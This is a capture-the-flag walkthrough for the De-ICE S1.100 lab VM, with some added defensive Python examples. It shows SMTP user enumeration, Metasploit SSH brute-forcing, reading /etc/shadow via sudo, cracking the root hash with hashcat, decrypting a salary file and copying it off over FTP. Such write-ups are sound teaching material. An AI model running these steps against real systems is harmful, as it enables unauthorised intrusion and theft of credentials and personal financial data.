Scenario

The CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using Nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server - an old system that only has a web-based list of the company’s contact information.

The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Flags

  • Encrypted salary file
  • Broken FTP service

Port Scanning, Service Enumeration

Start by scanning the host to determine which ports are open and which services are running.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  nmap -n -A 192.168.1.100

Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-15 13:42 BST
Nmap scan report for 192.168.1.100
Host is up (0.000074s latency).
Not shown: 992 filtered ports
PORT    STATE  SERVICE  VERSION
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd (broken: could not bind listening IPv4 socket)
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
| ssh-hostkey: 
|   2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
|   2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_  2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
|_sshv1: Server supports SSHv1
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.1.200], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
|_imap-capabilities: NAMESPACE LOGIN-REFERRALS SORT MULTIAPPEND UNSELECT AUTH=LOGINA0001 LITERAL+ IDLE MAILBOX-REFERRALS BINARY THREAD=ORDEREDSUBJECT CAPABILITY OK STARTTLS completed SASL-IR SCAN THREAD=REFERENCES IMAP4REV1
443/tcp closed https
MAC Address: 00:0C:29:61:35:DD (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host: slax.example.net; OS: Unix

One possible way to get into this VM is by bruteforcing a valid ssh login - we first determine that password authentication is enabled by attempting to log in a few times.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  ssh [email protected]
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
Permission denied (publickey,password,keyboard-interactive).

The available authentication methods are printed after the permission denied message.

Username Harvesting

Open a browser and navigate to http://192.168.1.100, where we find the Information Company Portal.

The page contains a list of employee roles, names and email addresses - information we can use towards bruteforcing SSH. So let’s do that :)

The Wrong Way

Save the employee list to a file, then extract their usernames into a separate list.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list 
Head of HR: Marie Mary - [email protected] (On Emergency Leave)
Employee Pay: Pat Patrick - [email protected]
Travel Comp: Terry Thompson - [email protected]
Benefits: Ben Benedict - [email protected]
Director of Engineering: Erin Gennieg - [email protected]
Project Manager: Paul Michael - [email protected]
Engineer Lead: Ester Long - [email protected]
Sr. System Admin: Adam Adams - [email protected]
System Admin (Intern): Bob Banter - [email protected]
System Admin: Chad Coffee - [email protected]

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list | cut -d '-' -f2 | cut -d '@' -f1 | sed 's/^ //g'
marym
patrickp
thompsont
benedictb
genniege
michaelp
longe
adamsa
banterb
coffeec

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list | cut -d '-' -f2 | cut -d '@' -f1 | sed 's/^ //g' > usernames

Launch the Metasploit Framework.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  msfconsole -q
msf >

Use the ssh_login module and enter the following options:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS 192.168.1.100
msf auxiliary(ssh_login) > set USER_FILE /root/vulnhub/de-ice_s1.100/usernames
msf auxiliary(ssh_login) > set PASS_FILE /usr/share/wordlists/metasploit/password.lst
msf auxiliary(ssh_login) > run

[*] SSH - Starting bruteforce
[-] SSH - Failed: 'marym:!@#$%'
[!] No active DB -- Credential data will not be saved!
[-] SSH - Failed: 'marym:!@#$%^'
[-] SSH - Failed: 'marym:!@#$%^&'
[-] SSH - Failed: 'marym:!@#$%^&*'
[-] SSH - Failed: 'marym:!boerbul'
[-] SSH - Failed: 'marym:!boerseun'
[-] SSH - Failed: 'marym:!gatvol'
[-] SSH - Failed: 'marym:!hotnot'
[-] SSH - Failed: 'marym:!kak'
[-] SSH - Failed: 'marym:!koedoe'
[-] SSH - Failed: 'marym:!likable'

Come back in 4 hours to see zero results :( What did we do wrong?

We made two grave assumptions:

  • That the email address usernames were the same as their system login usernames.
  • That all those usernames existed on the system.

The Right Way

Take the employee list and extract their Full Names into a separate list.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list | cut -d '-' -f1 | cut -d ':' -f2 | sed 's/^ //g'
Marie Mary
Pat Patrick
Terry Thompson
Ben Benedict
Erin Gennieg
Paul Michael
Ester Long
Adam Adams
Bob Banter
Chad Coffee

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list | cut -d '-' -f1 | cut -d ':' -f2 | sed 's/^ //g' > fullnames

Grab this Gist by superkojiman (or any other similar tool) to generate lots of different possible usernames.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  /opt/namemash.py fullnames            
mariemary
marymarie
marie.mary
mary.marie
marym
mmary
mmarie
m.mary
m.marie
marie
mary
[...]

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  /opt/namemash.py fullnames > usernames

Now we want to actually verify which of these are valid user accounts on the target, which we can do via the smtp service. smtp-user-enum is a handy script for automating this process, but I always recommend trying manually in the first instance. Here’s why.

These are the examples provided in the smtp-user-enum script:

smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1
smtp-user-enum.pl -M EXPN -u admin1 -t 10.0.0.1
smtp-user-enum.pl -M RCPT -U users.txt -T mail-server-ips.txt
smtp-user-enum.pl -M EXPN -D example.com -U users.txt -t 10.0.0.1

If we try each one in turn:

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M VRFY -U usernames -t 192.168.1.100
######## Scan started at Sat Jul 15 14:45:07 2017 #########
192.168.1.100: marie.mary exists
192.168.1.100: mary.marie exists
192.168.1.100: mmary exists
[...]
192.168.1.100: chad exists
192.168.1.100: c.chad exists
192.168.1.100: coffee exists

######## Scan completed at Sat Jul 15 14:45:08 2017 #########
110 results.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M EXPN -U usernames -t 192.168.1.100 
######## Scan started at Sat Jul 15 14:47:38 2017 #########
######## Scan completed at Sat Jul 15 14:47:38 2017 #########
0 results.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M RCPT -U usernames -t 192.168.1.100
######## Scan started at Sat Jul 15 14:48:16 2017 #########
######## Scan completed at Sat Jul 15 14:48:16 2017 #########
0 results.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M EXPN -D herot.net -U usernames -t 192.168.1.100
######## Scan started at Sat Jul 15 14:54:14 2017 #########
######## Scan completed at Sat Jul 15 14:54:15 2017 #########
0 results.

We get no meaningful results.

To work out what’s going on, connect to the smtp service and run the commands manually - that way you can see the output being returned.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  ncat 192.168.1.100 25
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Sat, 15 Jul 2017 14:58:47 GMT
HELO x
250 slax.example.net Hello [192.168.1.200], pleased to meet you
VRFY mariemary
252 2.5.2 Cannot VRFY user; try RCPT to attempt delivery (or try finger)

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  ncat 192.168.1.100 25
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Sat, 15 Jul 2017 15:00:42 GMT
HELO x    
250 slax.example.net Hello [192.168.1.200], pleased to meet you
EXPN mariemary
502 5.7.0 Sorry, we do not allow this operation

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  ncat 192.168.1.100 25
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Sat, 15 Jul 2017 15:05:03 GMT
HELO x
250 slax.example.net Hello [192.168.1.200], pleased to meet you
RCPT TO: mariemary
503 5.0.0 Need MAIL before RCPT

MAIL FROM: [email protected]
451 4.1.8 Domain of sender address [email protected] does not resolve
MAIL FROM: [email protected]
451 4.1.8 Domain of sender address [email protected] does not resolve
MAIL FROM: [email protected]
553 5.5.4 [email protected] Real domain name required for sender address
MAIL FROM: [email protected]
451 4.1.8 Domain of sender address [email protected] does not resolve
MAIL FROM: [email protected]
250 2.1.0 [email protected] Sender ok

RCPT TO: mariemary
550 5.1.1 mariemary... User unknown
RCPT TO: root
250 2.1.5 root... Recipient ok

Now we are getting somewhere. We’ve learned that VRFY and EXPN don’t seem to work. RCPT does work, but only if we specify a MAIL FROM address @slax.example.net. Now automate the rest in smtp-user-enum.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M RCPT -U usernames -f [email protected] -t 192.168.1.100
######## Scan started at Sat Jul 15 15:14:44 2017 #########
192.168.1.100: aadams exists
192.168.1.100: bbanter exists
192.168.1.100: ccoffee exists
######## Scan completed at Sat Jul 15 15:14:44 2017 #########

We now know these are the only 3 users on the system (which makes sense against what we know from the portal page) and we see that their usernames are indeed different from their email addresses. Modify your usernames file so that it only contains these 3.

SSH

Go back to the ssh_login module and modify our options.

msf auxiliary(ssh_login) > unset PASS_FILE 
msf auxiliary(ssh_login) > set BLANK_PASSWORDS true
msf auxiliary(ssh_login) > set USER_AS_PASS true
msf auxiliary(ssh_login) > run 

[*] SSH - Starting bruteforce
[-] SSH - Failed: 'aadams:aadams'
[!] No active DB -- Credential data will not be saved!
[-] SSH - Failed: 'aadams:'
[+] SSH - Success: 'bbanter:bbanter' 'uid=1001(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 i686 i386 GNU/Linux '
[*] Command shell session 1 opened (192.168.1.200:43077 -> 192.168.1.100:22) at 2017-07-15 17:10:53 +0100
[-] SSH - Failed: 'ccoffee:ccoffee'
[-] SSH - Failed: 'ccoffee:'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We got a hit on valid creds - bbanter:bbanter.
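
From the defender's side, all of this activity lands in sshd's auth log. As an added example (not part of the original walkthrough), the script below parses constructed log lines in OpenSSH's real "Failed/Accepted password" wording and flags a source that produces many failures, guesses at non-existent accounts (what the Wrong Way above generates) and a success following failures; the usernames and addresses mirror the walkthrough, the timestamps and PIDs are made up.

```python
import re
from collections import defaultdict

# Constructed auth.log excerpt using OpenSSH's real "Failed/Accepted password" wording.
# The first four lines are what the "Wrong Way" (email-derived usernames) produces on
# the server; the rest correspond to the "Right Way" run against the three real accounts.
SAMPLE_AUTH_LOG = """\
Jul 15 14:02:11 slax sshd[2011]: Failed password for invalid user marym from 192.168.1.200 port 40122 ssh2
Jul 15 14:02:12 slax sshd[2013]: Failed password for invalid user patrickp from 192.168.1.200 port 40124 ssh2
Jul 15 14:02:12 slax sshd[2015]: Failed password for invalid user thompsont from 192.168.1.200 port 40126 ssh2
Jul 15 14:02:13 slax sshd[2017]: Failed password for invalid user benedictb from 192.168.1.200 port 40128 ssh2
Jul 15 17:10:50 slax sshd[2301]: Failed password for aadams from 192.168.1.200 port 43071 ssh2
Jul 15 17:10:51 slax sshd[2303]: Failed password for aadams from 192.168.1.200 port 43073 ssh2
Jul 15 17:10:53 slax sshd[2305]: Accepted password for bbanter from 192.168.1.200 port 43077 ssh2
Jul 15 17:10:54 slax sshd[2307]: Failed password for ccoffee from 192.168.1.200 port 43079 ssh2
Jul 15 18:00:01 slax sshd[2400]: Accepted password for ccoffee from 192.168.1.50 port 51000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:(?P<invalid>invalid user) )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port \d+ ssh2$"
)


def parse_auth_log(text):
    """Turn sshd password-auth lines into dicts; anything else (key auth, pam noise) is skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append({"ts": m["ts"], "result": m["result"], "user": m["user"],
                           "src": m["src"], "invalid": m["invalid"] is not None})
    return events


def detect_bruteforce(events, fail_threshold=3):
    """Per source IP: count failures, count distinct non-existent usernames (username
    guessing) and record any login that succeeded after earlier failures from that source."""
    state = defaultdict(lambda: {"failed": 0, "invalid_users": set(), "successes": []})
    for ev in events:
        s = state[ev["src"]]
        if ev["result"] == "Failed":
            s["failed"] += 1
            if ev["invalid"]:
                s["invalid_users"].add(ev["user"])
        elif s["failed"] > 0:
            s["successes"].append(ev["user"])
    return {
        src: {"failed": s["failed"],
              "usernames_guessed": len(s["invalid_users"]),
              "compromised": sorted(set(s["successes"]))}
        for src, s in state.items() if s["failed"] >= fail_threshold
    }


if __name__ == "__main__":
    for src, finding in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(src, finding)
```

The single success from 192.168.1.50 is not flagged because it has no failures in front of it, which is the distinction that keeps an ordinary login out of the report.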

You can use the built-in ssh client of MSF.

msf auxiliary(ssh_login) > sessions 

Active sessions
===============

  Id  Type          Information                             Connection
  --  ----          -----------                             ----------
  1   shell /linux  SSH bbanter:bbanter (192.168.1.100:22)  192.168.1.200:43077 -> 192.168.1.100:22 (192.168.1.100)

msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

id; whoami; pwd
uid=1001(bbanter) gid=100(users) groups=100(users)
bbanter
/home/bbanter

But since it doesn’t have a command prompt and can’t do tab completion etc., I prefer to use the regular OpenSSH client.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password: 
Linux 2.6.16.
bbanter@slax:~$ id; whoami; pwd 
uid=1001(bbanter) gid=100(users) groups=100(users)
bbanter
/home/bbanter

Situational Awareness

Confirm the users of the system by reading /etc/passwd.

bbanter@slax:~$ cat /etc/passwd 
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
[...]
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

We see that aadams has a uid (User ID) of 1000 and a gid (Group ID) of 10. bbanter and ccoffee have a gid of 100. By reading /etc/group, we find what these groups mean.

bbanter@slax:~$ cat /etc/group 
root::0:root
[...]
wheel::10:root
[...]
users::100:

bbanter and ccoffee are just users; aadams is a member of wheel. The wheel group is used on some Linux systems to allow its members to su to root, so it indicates a level of privileged access. To obtain root access, then, aadams looks like a good target.

We find an ftp folder by looking at the home directories, but we need to be root to access it.

bbanter@slax:~$ ls -l /home/
total 0
drwxr-x--- 2 aadams  users  80 Jun 29  2007 aadams
drwxr-x--- 2 bbanter users 100 Jul 15 13:18 bbanter
drwxr-x--- 2 ccoffee users  80 Jun 29  2007 ccoffee
drwx------ 3 root    root   60 Jun 29  2007 ftp

More Bruteforce

To get access as aadams, we do some more intense ssh bruteforcing. This one takes significantly longer though.

msf auxiliary(ssh_login) > set BLANK_PASSWORDS false
msf auxiliary(ssh_login) > set USERNAME aadams
msf auxiliary(ssh_login) > unset USER_FILE 
msf auxiliary(ssh_login) > set PASS_FILE /usr/share/wordlists/metasploit/password.lst
msf auxiliary(ssh_login) > set STOP_ON_SUCCESS true
msf auxiliary(ssh_login) > run 

[+] SSH - Success: 'aadams:nostradamus' 'uid=1000(aadams) gid=10(wheel) groups=10(wheel) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 i686 i386 GNU/Linux '

Since we’re still logged in as bbanter, we just use su to switch to aadams.

bbanter@slax:~$ su aadams
Password: ***********
aadams@slax:/home/bbanter$ id; whoami
uid=1000(aadams) gid=10(wheel) groups=10(wheel)
aadams

Getting Root

List the commands aadams is allowed to run with sudo.

aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*

We are specifically forbidden from running su with the string root in its arguments.

aadams@slax:~$ su root
Password: ***********
Sorry.

Running ls as root means we can now see inside the ftp directory.

aadams@slax:~$ sudo ls -lR /home/ftp/
/home/ftp/:
total 0
dr-xr-xr-x 2 root root 80 Jun 29  2007 incoming

/home/ftp/incoming:
total 140
-r-xr-xr-x 1 root root 133056 Jun 29  2007 salary_dec2003.csv.enc

There’s our encrypted salary information. From the clue in /etc/passwd, we can surmise we need the root password to decrypt the file.

Use sudo to read the password hashes from /etc/shadow.

aadams@slax:~$ sudo cat /etc/shadow 
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
[...]
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

$1$ means this is an MD5-crypt hash and TOi0HE5n is the salt. Each hash uses a different salt, which prevents the use of rainbow table attacks.
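
To make that format concrete, here is an added example (not code from the original post) that implements the MD5-crypt scheme behind $1$ in pure Python: it splits a shadow field into salt and hash, recomputes the hash for a candidate password with the stored salt, and shows that the same password under two different salts gives unrelated hashes. The __main__ block checks root's hash above against the password hashcat reports further down.

```python
import hashlib

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """crypt(3)-style base64: `count` characters, least-significant 6 bits first."""
    out = ""
    for _ in range(count):
        out += _ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5_crypt(password, salt):
    """MD5-crypt as in FreeBSD/glibc crypt(3): '$1$' + salt (max 8 chars) + '$' + 22 chars."""
    pw = password.encode()
    salt = salt[:8].encode()
    # Alternate digest MD5(pw + salt + pw), mixed in one byte per byte of the password.
    alt = hashlib.md5(pw + salt + pw).digest()
    ctx = hashlib.md5(pw + b"$1$" + salt)
    n = len(pw)
    while n > 0:
        ctx.update(alt[:min(16, n)])
        n -= 16
    # Quirk inherited from the original implementation: walk the bits of len(pw).
    i = len(pw)
    while i:
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 stretching rounds, each re-mixing password, salt and the running digest.
    for i in range(1000):
        rnd = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            rnd.update(salt)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()
    # Output bytes are permuted in 3-byte groups before encoding.
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in groups)
    return "$1$" + salt.decode() + "$" + enc + _to64(final[11], 2)


def parse_shadow_hash(field):
    """Split a '$1$salt$hash' shadow field into (salt, hash); rejects other schemes."""
    parts = field.split("$")
    if len(parts) != 4 or parts[1] != "1":
        raise ValueError("not an MD5-crypt ($1$) hash")
    return parts[2], parts[3]


def check_password(candidate, shadow_field):
    """True if the candidate, hashed with the stored salt, reproduces the stored hash."""
    salt, _ = parse_shadow_hash(shadow_field)
    return md5_crypt(candidate, salt) == shadow_field


if __name__ == "__main__":
    root_hash = "$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0"   # root's field from /etc/shadow above
    print("tarot reproduces root's hash:", check_password("tarot", root_hash))
    # Same password, two salts from the listing above: unrelated hashes, so no shared lookup table.
    print(md5_crypt("tarot", "TOi0HE5n"))
    print(md5_crypt("tarot", "6cP/ya8m"))
```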

Feed these into a password cracker like John the Ripper or hashcat.

hashcat64.exe -a 3 -m 500 C:\Users\Rasta\Desktop\de-ice_s1-100_hashes -i ?l?l?l?l?l?l
$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:tarot

Now switch to root.

aadams@slax:~$ su root
Password: *****
root@slax:/home/aadams# id; whoami
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
root

Getting the Flag

Now we can access the encrypted file and have full control over the VM. The challenge description hinted that it wanted us to fix the broken ftp service and use that to exfiltrate the flag.

root@slax:/home/ftp/incoming# head -n 1 salary_dec2003.csv.enc | strings 
Salted__n
Lw$A`
YN>7
#ki8

Salted__ is a clue that the file was encrypted with OpenSSL - De-ICE is obviously running an old version.

root@slax:~# openssl 
OpenSSL> version
OpenSSL 0.9.8b 04 May 2006

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  openssl
OpenSSL> version
OpenSSL 1.1.0e  16 Feb 2017

The two are different enough that commands on one won’t work on the other. To keep this walkthrough in keeping with the original solution of the time, we’ll decrypt the file on the VM and transfer it to ourselves via FTP (instead of the other way around).

We don’t yet know which cipher was used for the encryption - we can print a list of those available.

root@slax:/home/ftp/incoming# openssl list-cipher-commands
aes-128-cbc
aes-128-ecb
aes-192-cbc
[...]
rc2-ofb
rc4
rc4-40

In this version of OpenSSL, there are 42. You can write a script that will run through and try them all, or you can get lucky, try the first one and win ;)
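
As an added example (not part of the original walkthrough), the parser below shows what the Salted__ header actually carries and how `openssl enc` turns a passphrase plus that salt into a key and IV with its legacy EVP_BytesToKey derivation. Two things follow from it: the header names no cipher, which is why the cipher has to be guessed above, and the derivation's digest is a parameter (MD5 on 0.9.8, SHA-256 by default from 1.1.0), which is why a 1.1.0 client needs `-md md5` to decrypt a file produced by 0.9.8. The sample file bytes are constructed.

```python
import hashlib

MAGIC = b"Salted__"


def parse_openssl_enc_header(blob):
    """Split an `openssl enc -salt` output into (salt, ciphertext).
    The header is just the 8-byte magic plus an 8-byte random salt: nothing in it
    records which cipher, digest or iteration count was used, so those must be known."""
    if len(blob) < 16 or blob[:8] != MAGIC:
        raise ValueError("not an OpenSSL Salted__ file")
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password, salt, key_len, iv_len, digest="md5", count=1):
    """EVP_BytesToKey, the legacy derivation `enc` applies to the password and salt:
    D_1 = H(pw|salt), D_i = H(D_{i-1}|pw|salt), concatenated until key+iv bytes exist.
    `enc` uses count=1; `digest` is md5 on OpenSSL 0.9.8 and sha256 by default from 1.1.0."""
    h = getattr(hashlib, digest)
    material, prev = b"", b""
    while len(material) < key_len + iv_len:
        block = h(prev + password + salt).digest()
        for _ in range(count - 1):      # extra iterations, not used by `enc`
            block = h(block).digest()
        material += block
        prev = block
    return material[:key_len], material[key_len:key_len + iv_len]


def derive_aes128cbc(password, blob, digest="md5"):
    """Key and IV an `openssl enc -aes-128-cbc -d` run would derive for this file."""
    salt, _ = parse_openssl_enc_header(blob)
    return evp_bytes_to_key(password, salt, 16, 16, digest)


if __name__ == "__main__":
    # Constructed stand-in for salary_dec2003.csv.enc: real magic, made-up salt and body.
    sample = MAGIC + bytes.fromhex("0011223344556677") + bytes(range(32))
    salt, body = parse_openssl_enc_header(sample)
    print("salt:", salt.hex(), "ciphertext bytes:", len(body))
    for name in ("md5", "sha256"):
        key, iv = derive_aes128cbc(b"tarot", sample, name)  # root password found above
        print(f"{name:6} key={key.hex()} iv={iv.hex()}")
```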

root@slax:/home/ftp/incoming# openssl enc -aes-128-cbc -d -in salary_dec2003.csv.enc -out salary_dec2003.csv
enter aes-128-cbc decryption password:

root@slax:/home/ftp/incoming# ls -l
total 280
-rw-r--r-- 1 root root 133038 Jul 16 00:17 salary_dec2003.csv
-r-xr-xr-x 1 root root 133056 Jun 29  2007 salary_dec2003.csv.enc

root@slax:/home/ftp/incoming# less salary_dec2003.csv
,Employee information,,,,,,,,,,,,,,
,Employee ID,Name,Salary,Tax Status,Federal Allowance (From W-4),State Tax (Percentage),Federal Income Tax (Percentage based on Federal Allowance),Social Security Tax (Percentage),Medicare Tax (Percentage),Total
 Taxes Withheld (Percentage),"Insurance
Deduction
(Dollars)","Other Regular
Deduction
(Dollars)","Total Regular Deductions (Excluding taxes, in dollars)","Direct Deposit Info
Routing Number","Direct Deposit Info
Account Number"
,1,Charles E. Ophenia,"$225,000.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$360.00,$500.00,$860.00,183200299,1123245
,2,Marie Mary,"$56,000.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$100.00,$225.00,183200299,1192291
,3,Pat Patrick,"$43,350.00",1,1,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,2334432
,4,Terry Thompson,"$27,500.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$225.00,$350.00,183200299,1278235
,5,Ben Benedict,"$29,750.00",1,3,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$122.50,$247.50,183200299,2332546
,6,Erin Gennieg,"$105,000.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1456567
,7,Paul Michael,"$76,000.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$100.00,$225.00,183200299,1446756
,8,Ester Long,"$92,500.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1776782
,9,Adam Adams,"$76,250.00",1,5,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,2250900
,10,Chad Coffee,"$55,000.00",1,1,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1590264
,11,,,,,,,,,0.00%,,,$0.00,0,0
,12,,,,,,,,,0.00%,,,$0.00,0,0
,13,,,,,,,,,0.00%,,,$0.00,0,0
,14,,,,,,,,,0.00%,,,$0.00,0,0
,15,,,,,,,,,0.00%,,,$0.00,0,0
,16,,,,,,,,,0.00%,,,$0.00,0,0
,17,,,,,,,,,0.00%,,,$0.00,0,0
,18,,,,,,,,,0.00%,,,$0.00,0,0
,19,,,,,,,,,0.00%,,,$0.00,0,0
,20,,,,,,,,,0.00%,,,$0.00,0,0
,21,,,,,,,,,0.00%,,,$0.00,0,0
,22,,,,,,,,,0.00%,,,$0.00,0,0
,23,,,,,,,,,0.00%,,,$0.00,0,0
,24,,,,,,,,,0.00%,,,$0.00,0,0
,25,,,,,,,,,0.00%,,,$0.00,0,0

Exfiltrate

Modify /etc/vsftp.conf (you will probably need to look up a vi cheat sheet!). Enable anonymous access by changing anonymous_enable=NO to anonymous_enable=YES; comment out the final line so that vsftp runs through inetd: listen=YES to #listen=YES.

Exit vi then run modprobe capability.

Run nmap again and you should have different results.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  nmap -n -p20,21 -A 192.168.1.100

Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-16 10:36 BST
Nmap scan report for 192.168.1.100
Host is up (0.000086s latency).
PORT   STATE  SERVICE  VERSION
20/tcp closed ftp-data
21/tcp open   ftp      vsftpd 2.0.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT

To get the file, you need to actually log in as root.

╭─[email protected] ~/vulnhub/de-ice_s1.100  
╰─➤  ftp 192.168.1.100
Connected to 192.168.1.100.
220 (vsFTPd 2.0.4)
Name (192.168.1.100:root): root
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/root"
ftp> cd /home/ftp/incoming
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0          133038 Jul 16 00:17 salary_dec2003.csv
-r-xr-xr-x    1 0        0          133056 Jun 29  2007 salary_dec2003.csv.enc
226 Directory send OK.
ftp> get salary_dec2003.csv
local: salary_dec2003.csv remote: salary_dec2003.csv
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for salary_dec2003.csv (133038 bytes).
226 File send OK.
133038 bytes received in 0.00 secs (48.2231 MB/s)
ftp> bye
221 Goodbye.